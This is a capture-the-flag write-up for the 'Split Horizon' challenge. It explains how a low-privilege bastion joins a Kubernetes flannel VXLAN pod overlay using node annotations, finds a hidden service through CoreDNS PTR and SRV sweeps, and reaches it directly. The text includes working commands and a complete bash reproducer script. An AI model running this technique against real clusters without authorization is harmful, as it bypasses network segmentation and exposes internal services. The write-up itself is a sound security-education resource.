Split Horizon CTF: Joining a Kubernetes Pod Overlay from Outside the Cluster
Split Horizon CTF: Challenge Brief
A Kubernetes team split a sensitive diagnostics endpoint away from the normal access path after an incident review. The bastion account can see only node-level metadata.
You have shell access to a bastion inside the lab. Map the network from what the nodes reveal, discover the hidden endpoint through DNS, and reach it without creating any Kubernetes resources.
Author's note: "There are a lot of weird quirks with Kubernetes and containers in general. This challenge shows a nice fun one. I've used variations of this technique on a client engagement to get to some containers that I shouldn't have been able to reach as part of a larger attack path."
Hint 1: Node-only does not mean blind. Start by mapping what the bastion account can list.
Hint 2: Cluster DNS can answer questions even when the API will not list Services for you.
Hint 3: Reverse-looking-up cluster IPs can reveal the endpoint name. Nodes still know how to deliver the traffic.
Useful starting points dropped on the lab shell:
kubectl auth can-i --list
kubectl get nodes -o json
dig @<dns-server> -x <cluster-ip>
ip addr
ip route
tcpdump -ni eth0
Split Horizon Lab Environment
Cluster: k3d (k3s 1.31.5+k3s1, flannel VXLAN backend)
Underlay (Docker): 172.30.0.0/16 - research-lab-network
172.30.0.1 docker bridge gateway
172.30.0.2 master-1 (k3s server, control-plane)
172.30.0.3 worker-2
172.30.0.4 worker-1
172.30.0.5 bastion (us)
Pod CIDRs:
master-1 10.42.0.0/24
worker-1 10.42.1.0/24
worker-2 10.42.2.0/24
Service CIDR: 10.43.0.0/16
Cluster DNS (decoy): 10.43.0.10 (Service exists, has no endpoints)
Identity: system:serviceaccount:kube-system:bastion-viewer
The bastion is itself a Docker container on the same research-lab-network bridge as all three k3s nodes. Flat L2 connectivity to the underlay, no L3 hops between us and the nodes. That detail ends up mattering a lot.
Split Horizon TL;DR
The bastion has only get/list nodes on a k3d cluster, and the cluster DNS Service kube-dns at 10.43.0.10 has been deliberately gutted of endpoints. kube-proxy installs an iptables rule for it, but with no backends it silently drops every packet. The --cluster-dns flag advertised by kubelet is a decoy.
Node objects still publish their flannel VXLAN annotations (VTEP MAC and underlay IP), which is enough information to manually join the pod overlay as a peer from the bastion. The non-obvious trick that makes the return path work is sourcing inner packets from the bastion's underlay IP: pods then reply directly to the bastion as plain L3 traffic on the Docker bridge, with no need for any node to learn our VTEP MAC and no Kubernetes resources created.
From there it's classic DNS recon: query the real CoreDNS at its pod IP, PTR-sweep the service CIDR to find the hidden endpoint name (flag-server.target.svc.cluster.local at 10.43.0.37), SRV query for the port (31337), and connect to the pod IP directly because the Service VIP routes don't reach kube-proxy correctly for our source. The flag-server is a small TCP server that responds to the literal command flag.
Phase 1: Mapping the Bastion's RBAC
kubectl auth can-i --list
Came back showing nodes [get list] plus the standard non-resource discovery URLs (/api, /apis, /healthz). Every other resource was forbidden:
services - forbidden
endpoints - forbidden
endpointslices - forbidden (different RBAC than 'endpoints', also forbidden)
configmaps - forbidden
namespaces - forbidden
pods - forbidden
events - forbidden
nodes/proxy - forbidden
nodes/log - forbidden
nodes/stats - forbidden
leases - forbidden
create/patch * - forbidden
Gotcha: kubectl auth can-i lied for some node subresources. It returned yes for nodes/proxy, nodes/log, nodes/configz, etc., but actual API calls came back forbidden ("cannot get resource 'nodes/proxy' in API group ''"). The only reliable check is making the call.
The kubeconfig held a single SA token (bastion-viewer in kube-system). No Docker socket mounted, no other kubeconfigs on disk, no admin contexts, no readable secret stash. The credential surface is genuinely a single low-privilege SA.
Phase 2: Reading What Nodes Reveal
kubectl get nodes -o json | jq '.items[] | {name, addresses: .status.addresses, podCIDR: .spec.podCIDR, annotations: .metadata.annotations}'
The k3s server flags appear right in the node annotations:
master-1:
k3s.io/node-args = ["server","--node-name","master-1",
"--service-cidr","10.43.0.0/16",
"--cluster-dns","10.43.0.10",
"--flannel-backend","vxlan",
"--disable-network-policy",
"--disable","traefik,metrics-server,servicelb,local-storage",
"--kube-apiserver-arg","watch-cache=false",
"--kube-apiserver-arg","event-ttl=10m",
"--tls-san","0.0.0.0"]
watch-cache=false and event-ttl=10m are deliberately defensive. The author wanted to limit info leakage through events and watch streams.
The interesting annotations on every node are flannels:
flannel.alpha.coreos.com/backend-data = {"VNI":1,"VtepMAC":"<mac>"}
flannel.alpha.coreos.com/backend-type = vxlan
flannel.alpha.coreos.com/public-ip = <node underlay IP>
That gives us, for free:
| Node | Underlay IP | Pod CIDR | VTEP MAC |
|---|---|---|---|
| master-1 | 172.30.0.2 |
10.42.0.0/24 |
72:6c:75:ba:48:cb |
| worker-1 | 172.30.0.4 |
10.42.1.0/24 |
9e:dd:0e:f3:9b:8e |
| worker-2 | 172.30.0.3 |
10.42.2.0/24 |
4a:95:90:04:46:ab |
This is all the information needed to construct a flannel VXLAN peer. No node registration required, no Kubernetes resource creation.
Phase 3: The Decoy DNS Service
First obvious move: try the cluster DNS.
ip route add 10.43.0.0/16 via 172.30.0.4 dev eth0
dig @10.43.0.10 cluster.local SOA +time=3 +tries=1
Times out. Both UDP and TCP. Identical via every node gateway (172.30.0.2/3/4). With tcpdump, the bastion sends but nothing comes back. Not a reply, not even an ICMP unreachable.
Compare to the kube API:
$ curl -sk https://10.43.0.1/healthz
# returns 401 in 8ms
The API VIP at 10.43.0.1 works fine through the same path. So routing isn't the problem; the kube-dns Service simply has no endpoints behind it. kube-proxy installs an iptables rule for the ClusterIP, but with no backends to DNAT to, traffic gets silently dropped at the rule. The --cluster-dns=10.43.0.10 advertised by kubelet is a misdirection. The real CoreDNS pod is alive somewhere; we just have to bypass the broken Service to talk to it.
Confirmed dead ends ruled out at this stage:
- TCP/UDP port scans across
10.43.0.0/24and a sample of other/24s in the service CIDR (only the API VIP responds; no second DNS service) - Direct TCP/UDP/53 (and 853, 1053, 5353, 8053, 9053, 9153) to all four underlay IPs (every port returned
connection refused; no host-network DNS) - NodePort UDP scans on all three nodes (no NodePort DNS service exists)
- Docker DNS at
127.0.0.11(knows the fourresearch-lab-networkcontainers and nothing else) - API enumeration via
--rawpaths (/api/v1/services,/apis/discovery.k8s.io/v1/endpointslices,/api/v1/nodes/<n>/proxy/pods, etc.), all forbidden - Direct kubelet on
:10250and the deprecated read-only port:10255(all 401/closed) - Source-IP spoofing onto a pod-CIDR alias on
eth0(encap not happening, return path broken) - Searching for alternate kubeconfigs, Docker sockets, or admin tokens (none exist)
Phase 4: Building a Flannel VXLAN Peer from Outside
The plan: create a VXLAN device on the bastion with the same VNI and UDP port as flannel, manually populate FDB and ARP tables from the node annotations, and route the pod CIDRs through it.
ip link add flannel.1 type vxlan id 1 dev eth0 dstport 8472 nolearning
ip link set flannel.1 up
ip addr add 10.42.99.0/32 dev flannel.1 # cosmetic, never used as src
FDB entries, how to encap to each node's VTEP MAC:
bridge fdb append 72:6c:75:ba:48:cb dev flannel.1 dst 172.30.0.2 self permanent
bridge fdb append 9e:dd:0e:f3:9b:8e dev flannel.1 dst 172.30.0.4 self permanent
bridge fdb append 4a:95:90:04:46:ab dev flannel.1 dst 172.30.0.3 self permanent
Static ARP for each node's pod-CIDR gateway (.X.0):
ip neigh add 10.42.0.0 lladdr 72:6c:75:ba:48:cb dev flannel.1
ip neigh add 10.42.1.0 lladdr 9e:dd:0e:f3:9b:8e dev flannel.1
ip neigh add 10.42.2.0 lladdr 4a:95:90:04:46:ab dev flannel.1
Routes via flannel.1 to each pod CIDR:
ip route add 10.42.0.0/24 via 10.42.0.0 dev flannel.1 onlink
ip route add 10.42.1.0/24 via 10.42.1.0 dev flannel.1 onlink
ip route add 10.42.2.0/24 via 10.42.2.0 dev flannel.1 onlink
A tcpdump confirms the VXLAN encap is correct (OTV/8472, VNI=1), packets arrive at the right destination underlay IPs. But nothing comes back. Every probe was outbound only.
That makes sense: the receiving node has no FDB entry mapping our flannel.1 MAC to our underlay IP. When a pod replies to 10.42.99.0, the host node looks up the route, encaps to our MAC, consults its FDB to find the underlay endpoint for that MAC… and finds nothing. The reply gets dropped silently.
We can't add FDB entries on the nodes (we have no root there), and creating a Node object to make flannel auto-distribute our MAC would violate the "no Kubernetes resources" rule.
Phase 5: Source from the Bastion's Underlay IP
The fix turns out to be small and elegant. Linux's ip route lets us specify a source IP per-route:
ip route add 10.42.0.0/24 via 10.42.0.0 dev flannel.1 onlink src 172.30.0.5
ip route add 10.42.1.0/24 via 10.42.1.0 dev flannel.1 onlink src 172.30.0.5
ip route add 10.42.2.0/24 via 10.42.2.0 dev flannel.1 onlink src 172.30.0.5
Now when we encap a packet to a pod, the inner packet's source is 172.30.0.5, the bastion's underlay IP, an address that exists on the same Docker bridge as every node.
When the pod replies:
- Pod sends its reply to
172.30.0.5. - Its host node looks up the route to
172.30.0.5. 172.30.0.5is on the node'seth0(Docker bridge), not in any pod CIDR.- Reply leaves the node as a plain L3 packet on the underlay via the node's default gateway.
- Docker bridge delivers it directly to bastion.
No FDB lookup. No VXLAN encap on the return path. No node-side cooperation needed. The pod's reply comes back as normal IP traffic on eth0, just like any other underlay packet.
Confirmation on the wire:
14:00:09.311079 IP 172.30.0.5.50478 > 172.30.0.4.8472: OTV ... 10.42.1.2.53: SOA?
14:00:09.311692 IP 10.42.1.2.53 > 172.30.0.5.50478: SOA (147)
Outbound was VXLAN-encapped, inbound was plain L3, and bastion's userspace got the answer:
$ dig @10.42.1.2 cluster.local SOA +time=3 +tries=1
;; ANSWER SECTION:
cluster.local. 5 IN SOA ns.dns.cluster.local. hostmaster.cluster.local. ...
That makes Hint 2 work.
Phase 6: Finding the Hidden Endpoint via PTR Sweep
CoreDNS lives on 10.42.1.2 (worker-1). With it answering, Hint 3 falls out as a one-liner:
for i in $(seq 1 254); do
ans=$(dig @10.42.1.2 -x 10.43.0.$i +short +time=1 +tries=1 2>/dev/null)
[[ -n "$ans" ]] && echo "10.43.0.$i -> $ans"
done
Output:
10.43.0.1 -> kubernetes.default.svc.cluster.local.
10.43.0.10 -> kube-dns.kube-system.svc.cluster.local. <- the decoy
10.43.0.37 -> flag-server.target.svc.cluster.local. <- the target
The hidden service is in a non-obvious namespace (target) called flag-server. CoreDNS's PTR responses leak the FQDN, namespace, and ClusterIP all at once.
A SRV query reveals the port:
$ dig @10.42.1.2 SRV flag-server.target.svc.cluster.local +short
0 100 31337 flag-server.target.svc.cluster.local.
Port 31337. (Of course it's leetspeak.)
Phase 7: Reaching the Pod Directly
Routing the service CIDR through worker-1 with src 172.30.0.5 for TCP just like DNS gave us a connection timed out to 10.43.0.37:31337. The return-path trick that worked for UDP/53 didn't work the same way through kube-proxy DNAT for this TCP flow. Rather than debug the asymmetry, sweep the pod CIDRs directly on :31337 over our working overlay:
for cidr in 10.42.0 10.42.1 10.42.2; do
for i in $(seq 2 30); do
ip="$cidr.$i"
timeout 1 bash -c "echo > /dev/tcp/$ip/31337" 2>/dev/null && echo "OPEN: $ip:31337"
done
done
# OPEN: 10.42.1.4:31337
Direct connect to 10.42.1.4:31337 works.
$ curl -v --max-time 5 http://10.42.1.4:31337/
* Connected to 10.42.1.4 (10.42.1.4) port 31337 (#0)
> GET / HTTP/1.1
flag input: nope
* Recv failure: Connection reset by peer
Server speaks raw TCP (HTTP/0.9-ish), reads whatever bytes the client sends, looks for a magic word, and replies flag input: nope for anything it doesn't recognize. After a quick command-discovery round:
$ printf "flag\n" | nc -w 3 10.42.1.4 31337
flag input: WIZ_CTF{REDACTED}
The literal command flag returns the flag.
Split Horizon CTF Flag
WIZ_CTF{REDACTED}
Split Horizon Attack Chain
Read flannel VXLAN annotations off Node objects
|
v
Build a VXLAN peer on the bastion (no Node registration)
|
v
Source inner packets from bastion's underlay IP
so pod replies route back as plain L3 traffic
|
v
Query the real CoreDNS at its pod IP (Service VIP is a decoy)
|
v
PTR-sweep the service CIDR to discover flag-server.target.svc
|
v
SRV query for the port (31337)
|
v
Connect to the flag-server pod IP directly over the overlay
|
v
Send literal command 'flag', server returns the flag
Split Horizon Kubernetes Lessons Learned
- What nodes publish about themselves can be enough to join the network they live on. Flannel annotations exist for a reason (flannel itself uses them), but they're equally useful to anyone with
get nodes. - Service VIPs are not the network; they're a kube-proxy iptables rule that may or may not work. A Service with no endpoints silently drops traffic; pod IPs don't.
- Source IP selection is a routing decision, not just a socket option.
ip route … src <addr>lets you control which address upstream sees, and that choice can dictate whether the return path is encapsulated, routed, or dropped. - Flat L2 plus an overlay is one shared fabric. Segmentation that depends on "you can't see the pod network" assumes attackers won't reconstruct the overlay from public metadata. They will.
kubectl auth can-ican lie about node subresources. It returnedyesfornodes/proxy,nodes/log, andnodes/configz, but real API calls came back forbidden. Always verify by making the call.
Split Horizon One-Shot Reproducer
This script reproduces the entire solution from a fresh bastion and ends by printing the flag.
#!/bin/bash
# ============================================================================
# Wiz Cloud Security Championship #11 - Split Horizon
# Author: Mohit Gupta / Skybound
# Solution: one-shot reproducer from a fresh bastion
# ============================================================================
# Premise: bastion has only `get nodes` on a k3d cluster. The flag-server is a
# Kubernetes Service the API will not enumerate. We get to it by:
# 1. Reading flannel VXLAN annotations off node objects
# 2. Manually joining the pod overlay as a peer (no node registration)
# 3. Sourcing inner packets from bastion's underlay IP so replies come back
# as plain L3 traffic (the "weird quirk")
# 4. Querying CoreDNS directly at its pod IP (Service VIP has no endpoints)
# 5. PTR-sweeping the service CIDR to find flag-server's name
# 6. SRV query to find the listening port
# 7. Hitting the flag-server pod IP directly via the overlay
# 8. Sending the literal command 'flag' - server returns the flag string
# ============================================================================
set -e
echo "=== [0] Setup ==="
apt update -qq && apt install -y -qq nmap dnsutils tcpdump bridge-utils >/dev/null
echo ""
echo "=== [1] Map the network from node annotations (Hint 1) ==="
NODES_JSON=$(kubectl get nodes -o json)
echo "$NODES_JSON" | jq -r '.items[] | "\(.metadata.name) underlay=\(.metadata.annotations["flannel.alpha.coreos.com/public-ip"]) podCIDR=\(.spec.podCIDR) vtep=\(.metadata.annotations["flannel.alpha.coreos.com/backend-data"] | fromjson | .VtepMAC)"'
declare -A NODE_IP NODE_VTEP NODE_PODCIDR
while IFS=$'\t' read -r name underlay vtep podcidr; do
NODE_IP[$name]=$underlay
NODE_VTEP[$name]=$vtep
NODE_PODCIDR[$name]=$podcidr
done < <(echo "$NODES_JSON" | jq -r '.items[] | [.metadata.name, .metadata.annotations["flannel.alpha.coreos.com/public-ip"], (.metadata.annotations["flannel.alpha.coreos.com/backend-data"] | fromjson | .VtepMAC), .spec.podCIDR] | @tsv')
echo ""
echo "=== [2] Build flannel overlay peer ==="
ip link del flannel.1 2>/dev/null || true
for c in 0 1 2; do ip route del 10.42.$c.0/24 2>/dev/null || true; done
ip route del 10.43.0.0/16 2>/dev/null || true
# Same VNI/dstport as flannel
ip link add flannel.1 type vxlan id 1 dev eth0 dstport 8472 nolearning
ip link set flannel.1 up
ip addr add 10.42.99.0/32 dev flannel.1 # cosmetic; not used as src
# Populate FDB and ARP from node annotations
for name in "${!NODE_IP[@]}"; do
bridge fdb append "${NODE_VTEP[$name]}" dev flannel.1 dst "${NODE_IP[$name]}" self permanent
gw=$(echo "${NODE_PODCIDR[$name]}" | sed 's|/.*||')
ip neigh replace "$gw" lladdr "${NODE_VTEP[$name]}" dev flannel.1
done
# KEY TRICK: src 172.30.0.5 forces inner packets to be sourced from bastion's
# underlay IP, so pod replies route back as plain L3 traffic via the node's
# default gateway → docker bridge → us. No need for the receiving node to
# know our VTEP MAC.
BASTION_IP=$(ip -4 -o addr show eth0 | awk '{print $4}' | cut -d/ -f1)
for name in "${!NODE_PODCIDR[@]}"; do
cidr="${NODE_PODCIDR[$name]}"
gw=$(echo "$cidr" | sed 's|/.*||')
ip route add "$cidr" via "$gw" dev flannel.1 onlink src "$BASTION_IP"
done
echo "Routes:"
ip route show | grep 10.42
echo ""
echo "=== [3] Find CoreDNS pod by sweeping pod CIDRs (Hint 2) ==="
COREDNS_IP=""
for name in "${!NODE_PODCIDR[@]}"; do
cidr_base=$(echo "${NODE_PODCIDR[$name]}" | sed 's|\.0/.*||')
for i in $(seq 2 20); do
ip="$cidr_base.$i"
ans=$(timeout 1 dig @"$ip" cluster.local SOA +short +time=1 +tries=1 2>/dev/null | head -1)
if [[ -n "$ans" ]] && [[ "$ans" != *"error"* ]] && [[ "$ans" != *"timed out"* ]]; then
echo "CoreDNS found: $ip ($ans)"
COREDNS_IP="$ip"
break 2
fi
done
done
[[ -z "$COREDNS_IP" ]] && { echo "ERROR: no CoreDNS pod found"; exit 1; }
echo ""
echo "=== [4] PTR-sweep service CIDR to find target service (Hint 3) ==="
TARGET_SVC=""
TARGET_VIP=""
for i in $(seq 1 254); do
ans=$(dig @"$COREDNS_IP" -x 10.43.0.$i +short +time=1 +tries=1 2>/dev/null)
if [[ -n "$ans" ]]; then
echo "10.43.0.$i -> $ans"
if [[ "$ans" != *"kubernetes.default"* ]] && [[ "$ans" != *"kube-dns"* ]]; then
TARGET_SVC="${ans%.}"
TARGET_VIP="10.43.0.$i"
fi
fi
done
[[ -z "$TARGET_SVC" ]] && { echo "ERROR: no target service found"; exit 1; }
echo "Target: $TARGET_SVC @ $TARGET_VIP"
echo ""
echo "=== [5] SRV query to learn the port ==="
SRV_LINE=$(dig @"$COREDNS_IP" SRV "$TARGET_SVC" +short)
echo "SRV: $SRV_LINE"
TARGET_PORT=$(echo "$SRV_LINE" | awk '{print $3}')
[[ -z "$TARGET_PORT" ]] && { echo "ERROR: no SRV port"; exit 1; }
echo "Port: $TARGET_PORT"
echo ""
echo "=== [6] Find target pod IP (Service VIP isn't reachable for our source) ==="
TARGET_POD=""
for name in "${!NODE_PODCIDR[@]}"; do
cidr_base=$(echo "${NODE_PODCIDR[$name]}" | sed 's|\.0/.*||')
for i in $(seq 2 30); do
ip="$cidr_base.$i"
if timeout 1 bash -c "echo > /dev/tcp/$ip/$TARGET_PORT" 2>/dev/null; then
echo "Target pod open: $ip:$TARGET_PORT"
TARGET_POD="$ip"
break 2
fi
done
done
[[ -z "$TARGET_POD" ]] && { echo "ERROR: no pod listening on $TARGET_PORT"; exit 1; }
echo ""
echo "=== [7] Submit 'flag' command - server responds with the flag ==="
RESPONSE=$(printf "flag\n" | nc -w 3 "$TARGET_POD" "$TARGET_PORT")
echo "$RESPONSE"
FLAG=$(echo "$RESPONSE" | grep -oE 'WIZ_CTF\{[^}]+\}')
if [[ -n "$FLAG" ]]; then
echo ""
echo "==============================================="
echo "FLAG: $FLAG"
echo "==============================================="
else
echo ""
echo "Flag not found in response - paste output for analysis."
fi
Split Horizon CTF: Final Thoughts
Split Horizon is a beautiful demonstration of a recurring lesson in Kubernetes security: the API surface and the network surface are two different things, and the network does not care what RBAC says. The bastion's role bound it to get/list nodes and nothing else, which sounds tightly scoped, until you remember that nodes publish enough information to participate in the cluster's data plane, and the data plane runs on the same flat L2 segment the bastion lives on.
The source-IP trick (sourcing inner packets from the underlay IP so replies come back as plain L3 traffic) is the kind of small, elegant move that turns a stuck overlay into a working one. It exploits no bug. Linux's routing table did exactly what it was told to do; the pod's host node did exactly what it was told to do; flannel forwarded a packet whose inner header pointed at an address it didn't try to encap. Each link in the chain is "working as intended." It just so happens that those intentions, composed, hand an attacker a working overlay peer with no node-side cooperation.
The decoy kube-dns Service is a nice touch on the puzzle side; it teaches that a Kubernetes Service is just a kube-proxy iptables rule, and that a rule with no endpoints behind it silently drops traffic rather than refusing it. The lesson generalises: ClusterIPs are an abstraction over routing, and abstractions over routing fail in ways routers don't.
Challenge created by Mohit Gupta / Skybound as part of the Wiz Cloud Security Championship. Writeup completed: May 2026